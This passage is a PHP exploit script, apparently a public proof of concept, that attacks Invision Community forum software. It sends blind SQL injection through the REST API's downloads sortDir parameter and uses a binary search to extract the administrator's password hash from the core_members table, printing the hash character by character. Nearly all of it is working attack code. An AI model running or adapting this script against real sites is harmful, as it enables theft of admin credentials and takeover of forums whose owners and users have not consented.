"; print "\nExample....: php $argv[0] http://localhost/ips/ 6aaf2e085d179866ef40ad0ac9381b36"; print "\nExample....: php $argv[0] https://invisioncommunity.com/ 765ed33ba595c4da8d64c6c22138aa16\n\n"; die(); } list($url, $api_key) = [$argv[1], $argv[2]]; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, ["Authorization: Bearer ".base64_encode($api_key)]); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $url = "{$url}api/index.php?/downloads/files&sortBy=popular&sortDir=%s"; $sql = ",(select case when (%s) then 1 else 1*(select table_name from information_schema.tables)end)=1#"; $end = false; $min = true; $idx = 1; while (!$end) { $test = 256; for ($i = 7; $i >= 0; $i--) { $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i)); $sub_sql = "select if(ord(substr(members_pass_hash,{$idx},1))<{$test},1,0) from core_members limit 1"; curl_setopt($ch, CURLOPT_URL, sprintf($url, rawurlencode(sprintf($sql, $sub_sql)))); $min = !preg_match("/UNKNOWN_ERROR/", curl_exec($ch)); } if (($chr = $min ? ($test - 1) : ($test)) == 0) $end = true; $pass .= chr($chr); $min = true; $idx++; print "\r[-] Admin's password hash: {$pass}"; } print "\n";